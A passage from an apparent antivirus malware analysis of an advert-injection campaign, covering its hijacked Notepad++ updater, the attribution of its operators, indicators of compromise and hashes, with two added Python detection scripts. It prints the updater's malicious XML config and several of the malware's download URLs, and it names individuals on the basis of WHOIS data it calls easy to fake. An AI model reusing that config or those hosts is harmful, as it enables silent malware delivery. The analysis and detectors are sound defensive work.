Every several hours, or every time the computer is idle, the malware-toolchain updater is executed (i.e. GUP.exe and Convertor.exe). This is, however, not original code written by the malware authors; it is yet another misuse of free code21 that originally served as the automatic updater of the Notepad++ editor22.

The PDB debug-info path stored in GUP.exe, “G:\PROJECTS\VolaroTech\UPDATERS_NEW_IDEAS\gup_trunk\bin\GUP.pdb”, gives details about their use of this tool. It also contains the string VolaroTech, which most probably refers to Volaro Technologies & Applications23. The details will be discussed later.

The task of this updater is quite simple – it reads the location of the latest update from its XML configuration file, downloads the file, and executes it. The XML file is a 1:1 copy of the one from the aforementioned WinGUP project, with only one tag modified, InfoUrl, e.g.:

<?xml version="1.0" ?>
<GUPInput>
    <Version>4.6</Version>
    <InfoUrl>http://usads2.info/hpl88s6GT/Z4.php</InfoUrl>
    <ClassName2Close></ClassName2Close>
    <MessageBoxTitle extraCmd="" ecWparam="" ecLparam="">Notepad++ update</MessageBoxTitle>
    <SilentMode>yes</SilentMode>
</GUPInput>

Figure 35 – Updater XML configuration file24.

A few examples of other update sites are:

http://usttor.info/hV93AwPtr1u/B6.php

http://usdsd1.info/gCd7QYch/jzuFZ.php

http://usads2.info/zPj6FII6u6/jj.php

http://weath4us.info/mC81EyWEc/vb.php

http://weathus1.info/JCWNQ/GX1AA.php

http://weathtoous.info/fhcm5tie8u3w/bzugC.php

Such an update site (probably running the GUP server-side25) contains information about the availability of a new dropper. If that version is newer than the current installation, the file is downloaded and executed.

21 https://github.com/gup4win/wingup

22 http://docs.notepad-plus-plus.org/index.php/Auto_Updates

23 http://www.volarotech.com/

24 The comments have been removed for better readability.

25 http://sourceforge.net/projects/gup/
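As an added example (not code from the AVG post or from the malware), the following Python extracts network indicators from a PhantomJS configuration in the layout of Figure 34 and checks whether a WinGUP configuration like the one in Figure 35 has had its InfoUrl repointed away from Notepad++ and set to run silently. Both sample configurations are constructed, and the legitimate update domain notepad-plus-plus.org is an assumption made for this example.

```python
import json
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed PhantomJS config in the layout of Figure 34 (shortened; not the original file)
PHANTOM_CFG = """{
  "proxy_list": ["direct"],
  "replace_url_list": ["http://www.freewebseotools.com/API/H/ad.php"],
  "ua_list": ["Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
              "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"],
  "url_list": ["http://www.freewebseotools.com/seo/", "http://www.freewebseotools.com/web-tools/"]
}"""

# Constructed GUP.xml in the layout of Figure 35
GUP_XML = """<?xml version="1.0" ?>
<GUPInput>
  <Version>4.6</Version>
  <InfoUrl>http://usads2.info/hpl88s6GT/Z4.php</InfoUrl>
  <ClassName2Close></ClassName2Close>
  <MessageBoxTitle extraCmd="" ecWparam="" ecLparam="">Notepad++ update</MessageBoxTitle>
  <SilentMode>yes</SilentMode>
</GUPInput>"""

# Assumption: a genuine Notepad++ WinGUP config points InfoUrl at the project's own domain.
LEGIT_UPDATE_DOMAIN = "notepad-plus-plus.org"


def phantom_indicators(cfg_text):
    """Hosts the headless browser contacts, plus how many user-agents it can impersonate."""
    cfg = json.loads(cfg_text)
    hosts = set()
    for key in ("replace_url_list", "url_list"):
        for url in cfg.get(key, []):
            host = urlparse(url).hostname
            if host:
                hosts.add(host.lower())
    return {"hosts": sorted(hosts),
            "spoofed_user_agents": len(cfg.get("ua_list", [])),
            "proxies": list(cfg.get("proxy_list", []))}


def gup_verdict(xml_text):
    """Flag a WinGUP config whose InfoUrl no longer points at Notepad++ and that updates silently."""
    root = ET.fromstring(xml_text)
    if root.tag != "GUPInput":
        raise ValueError("not a WinGUP configuration")
    host = (urlparse((root.findtext("InfoUrl") or "").strip()).hostname or "").lower()
    legit = host == LEGIT_UPDATE_DOMAIN or host.endswith("." + LEGIT_UPDATE_DOMAIN)
    silent = (root.findtext("SilentMode") or "").strip().lower() == "yes"
    return {"info_url_host": host, "silent": silent, "hijacked": not legit,
            "suspicious": not legit and silent}


if __name__ == "__main__":
    print(phantom_indicators(PHANTOM_CFG))
    print(gup_verdict(GUP_XML))
```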


Figure 36 – Server-side information about the available updates.

During the update, all previously installed applications, configurations, and add-ons are overwritten by the new droppers (e.g. 5.exe, LiteC.exe).

At the time of writing, there exist multiple versions of the initial dropper (i.e. 5.exe). Apart from the aforementioned NSIS installer, other samples are packed by different tools such as UPX or MPRESS. The authors also used different icons and names for the other versions to make them look more unique.

Figure 37 – Different versions of the initial dropper.

However, the content of these droppers is practically the same (except for different update sites in the configuration files, passwords for the RAR archives, compilation timestamps, etc.).


7 Digging for Information

While digging for information about the authors of this malware, we found a few pieces that give an overview of the background of the malware. Here are some facts we found.

(1) The infection starts by downloading the WeatherApp from the aforementioned web page http://www.jasonschober.net/, registered by Jason Schober (Bucharest, Romania).

Figure 38 – WHOIS information for domain jasonschober.net.

According to available information, Jason Schober is the CTO of Jason Schober Media Inc. and describes himself as a “Desktop/Mobile monetization expert with over 8 years of hands-on experience”. Whether infecting users with malicious code can be classified as monetization is left for the reader to decide.

(2) The WeatherApp installer deploys the aforementioned GUP updater containing a reference to Volaro Technologies & Applications, with homepage http://volarotech.com/ (contact information: Sofia, Bulgaria).

Figure 39 – Homepage of “Volaro”.


This domain has been registered by someone called Sami Yosef ([email protected] and [email protected], Sofia, Bulgaria), who also registered more than 100 other domains:

Figure 40 – Shortened list of domains registered by Sami Yosef. The highlighted domains are related to this adverts-injection campaign.26

In this list, we can see many sites that have been used in this malicious campaign for spreading the malware executables (e.g. the GUP update sites http://usds1.info, http://usttor.info, http://usads2.info) as well as for serving the adverts (http://freewebseotools.com/, which is used for obtaining the adverts for the PhantomJS browser).

26 Some of the other domains are also quite suspicious, such as http://simply-google.com or http://gefreefirefox.info.

UPDATE: Furthermore, the same person registered the domain http://affsystem.info, which is used for notifying the authors about newly infected systems.

(3) The certificates used for signing the droppers and browser infectors contain two female names – Irina Mihaylovna and Irina Polyanskaya (again Sofia, Bulgaria). The email address used in one of the certificates refers to the domain http://ads-blocker.net/27.

Figure 41 – Homepage of “Ads Blocker”.

This page is an exact copy of the aforementioned VolaroTech homepage (only the name has been changed), and both domains also resolve to the same IP address28, which illustrates the interconnection of all of these components. Furthermore, both the WHOIS records and the contact information refer to the same location (Sofia) and person (Irina Mihaylovna).

(4) Furthermore, the site http://www.affiliatesys.info, contacted by the LiteC dropper for reporting newly infected victims, has been registered by someone called George Cristy (Riga, Latvia) with the registration email address [email protected].

The same email address has been used for registering the domain http://www.adfactorytech.com/, which is the main source of adverts and also the destination of the sniffed web pages visited by users. However, the registrant name differs – it is once again Irina Polyanskaya.

27 It is probably an attempt at a joke: naming something that constantly displays adverts an “Ads Blocker”.

28 https://www.virustotal.com/cs/ip-address/178.63.60.80/information/


(5) UPDATE: Instead of http://www.adfactorytech.com/, the adverts are now delivered via the site http://www.jasonadssrv.com/, which belongs to Jason Schober, as do several weather-forecast pages, such as http://www.deltaweather.com/, that are heavily visited in pop-up windows on the infected systems.

To be fair, neither the content of digital certificates nor the WHOIS records can be considered a fully trustworthy source of information, because they are easy to fake. However, all of these pieces together give us an overview of the group behind this malware campaign. Unlike other malware samples, which use outsourced third-party systems (e.g. delivery via exploit kits, executables stored on hacked WordPress pages, outsourced malware modules), this malware seems to be created and operated entirely by one group (perhaps based in Eastern Europe), because:

The delivery is done using the authors’ software hosted on their own web page.

Updates of the malware toolchain are obtained from their web pages as well.

Strings unintentionally left in the malware binaries prove the connection to those websites, companies, and their owners.

Injected adverts are delivered via web pages belonging to the same owners.

The last unanswered question is: how do they earn money? We also tried to figure this out, i.e. who is paying for the displayed adverts.

After several redirects from the authors’ page http://www.freewebseotools.com in PhantomJS and in infected users’ browsers, we detected a redirection to a JavaScript located at http://delivery.us.myswitchads.com (together with a user ID), which finally fetches and displays adverts from different advertisers.

Figure 42 – Fetching adverts from the adverts provider.


The site http://myswitchads.com is owned by Switch Concepts Ltd.29, which provides Switch, an advert auction system30 for advertisers and publishers (i.e. owners of web pages where the adverts are inserted). Based on these findings, our best guess is that the authors of this malware misuse this31 advert-switching system by being both a provider (e.g. http://www.freewebseotools.com) and a consumer (i.e. the end-user, via the browser injections on the infected PCs) at the same time. This creates another victim: the advertisers, who think they paid for impressions by users, not by malware running in the background of an infected PC.

29 http://www.switchconcepts.com

30 https://vimeo.com/95500195

31 We also detected misuse of other advert providers while analyzing this malware campaign.


8 Conclusion and Indicators of Compromise

The malicious code presented in this post is yet another profit-driven malware, which may not seem so dangerous at first sight. However, there is no such thing as "safe malware", and it always has to be considered a threat. In this case, the techniques used are not only annoying for the user, but also dangerous. For example, the malware downloads and installs unknown executables from remote servers without the user’s permission, silently communicates with remote servers, circumvents security policies (silent installation of browser extensions and overwriting them with malicious code), sends information about the visited pages to remote servers, and forces users to visit unsafe websites and advertisements.

Therefore, such malicious behavior cannot be tolerated. AVG customers are protected against these threats via the multi-level protection in AVG Internet Security. Others may at least check their systems using the following indicators of compromise.

IOC (Indicators of Compromise)

Files:

"C:\Users\{UserName}\AppData\Roaming\PlusN\GUP.exe";

"C:\Users\{UserName}\Documents\benko\rut.exe";

"C:\ProgramData\Convertor\Convertor.exe";

"C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_{32/64}.dll";

"C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\firefox\install.rdf" or "C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\jason@schober.net" containing AdTech references;

"C:\Users\{UserName}\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\{version}\background_with_deps.js" or the other extension "…\ooabkmkhabkahcjbgpiajffckeibpdoa\{version}\js\background.js" containing AdTech references;

"C:\Users\{UserName}\AppData\Roaming\{random string}\rinti.exe";

"C:\Users\{UserName}\AppData\Roaming\ornaldo\de10.exe" and other files and folders in this folder.

Registry keys:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{437B9306-2FDE-4054-A3C9-6B49507C12D0}" – "Vonteera";

"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{934B156A-3D17-3981-B78A-5C138F423AD6}" – "AdTech".

Scheduled tasks:

DE10 (de10.exe);

DriveMgr, blockerpro, Hubsy (rinti.exe);

mdb, mdb01 (mdb.exe);

WinKit, realtor, "App Update", "Application Update", etc. (GUP.exe);

A random short string (such as ZtH or zZt) (Convertor.exe).
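As an added example (not part of the AVG post), the following Python turns the file and registry indicators listed above, with the post's own placeholders such as {UserName}, {32/64} and {random string}, into anchored match patterns and runs them, together with the scheduled-task names, over a constructed host inventory. The sample paths, keys and task names in that inventory are invented for this demonstration.

```python
import re

# File and registry indicators as listed in the post, keeping the post's own placeholders
FILE_IOCS = [
    r"C:\Users\{UserName}\AppData\Roaming\PlusN\GUP.exe",
    r"C:\ProgramData\Convertor\Convertor.exe",
    r"C:\Users\{UserName}\AppData\Roaming\pdfie\PdfConv_{32/64}.dll",
    r"C:\Users\{UserName}\AppData\Roaming\{random string}\rinti.exe",
    r"C:\Users\{UserName}\AppData\Roaming\ornaldo\de10.exe",
]
REG_IOCS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{437B9306-2FDE-4054-A3C9-6B49507C12D0}",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{934B156A-3D17-3981-B78A-5C138F423AD6}",
]
# Scheduled-task names from the post; the random short names (e.g. ZtH) cannot be listed exactly
TASK_IOCS = {"DE10", "DriveMgr", "blockerpro", "Hubsy", "mdb", "mdb01",
             "WinKit", "realtor", "App Update", "Application Update"}

# Only these tokens are placeholders; the braces of registry GUIDs are matched literally
PLACEHOLDER = re.compile(r"\{(UserName|random string|version|32/64)\}")


def ioc_to_regex(ioc):
    """Compile one indicator into an anchored regex; NTFS paths are case-insensitive."""
    parts, pos = [], 0
    for m in PLACEHOLDER.finditer(ioc):
        parts.append(re.escape(ioc[pos:m.start()]))
        # {32/64} is an alternation; every other placeholder stands for one path component
        parts.append(r"(?:32|64)" if m.group(1) == "32/64" else r"[^\\]+")
        pos = m.end()
    parts.append(re.escape(ioc[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


FILE_PATTERNS = [ioc_to_regex(i) for i in FILE_IOCS]
REG_PATTERNS = [ioc_to_regex(i) for i in REG_IOCS]


def scan(files, reg_keys, tasks):
    """Return (kind, value) for every inventory item that matches an indicator."""
    hits = [("file", f) for f in files if any(p.match(f) for p in FILE_PATTERNS)]
    hits += [("registry", k) for k in reg_keys if any(p.match(k) for p in REG_PATTERNS)]
    hits += [("task", t) for t in tasks if t in TASK_IOCS]
    return hits


# Constructed inventory of a hypothetical host (not data from the post)
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Roaming\PlusN\GUP.exe",
    r"C:\Users\alice\AppData\Roaming\pdfie\PdfConv_64.dll",
    r"C:\Users\alice\AppData\Roaming\x7Qz\rinti.exe",
    r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\profiles.ini",
]
SAMPLE_REG = [r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{437B9306-2FDE-4054-A3C9-6B49507C12D0}"]
SAMPLE_TASKS = ["mdb01", "GoogleUpdateTaskMachineCore", "Hubsy"]

if __name__ == "__main__":
    for kind, value in scan(SAMPLE_FILES, SAMPLE_REG, SAMPLE_TASKS):
        print(kind, value)
```

On a real host the three inventories would come from a file listing, a registry export and the Task Scheduler, and the random-named task (ZtH, zZt) still needs a look at what the task actually runs.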


Appendix A – SHA256 Checksums of Analyzed Samples

28b57f5948a19a65960a3ad82a37fe355d487c6c5a34f45aa3a95288fa881970 – WeatherAppSetup.exe

ec8e616f728f035d09ab43b070187b98b15a8ca93b83daddee7199dff5411db2 – 5.exe

20ac2bf67caffe00fcd8987787acd0cbe1b6b4c25dc56181c0346178c0f19ea5 – rinm.exe

74bc812d1e617dead08170548c629269784e0cbf45026312dc3d91cb0699ea7e – LiteC.exe

c05dae7fef3a838184f33f3ef0ebe1f44c3c24bde58c3b24ca53b662b2d81354 – Ob.dat (RAR)

ec1f3978c264046e9dc4bfe5063fd7a27c4f42cf715bb2ce0947455092e375c8 – de10.exe

7c3e325bfc86417cbedd0a2c9048dd59d1ca29b8de0706bce1d3f1697856f9f3 – GUP.exe

39e4ad466f912c0a5f09bfbcc39d04962c8f8e958bd8dfda686088d6d412fe0d – GUP.xml

f5bc980a4227da5279b29da561411e81522540a90a1ab6bd4938147f04465c96 – PdfConv_32.dll

29f0a7cdbc76fd8b52aa329a063eeb2e57b964d661a06e920cbce5e583e5c864 – PdfConv_64.dll

b7bf1138db20610096b34c6eb1fa3b3e8f30ccd20011b7adcfb815aee516b711 – rinti.exe
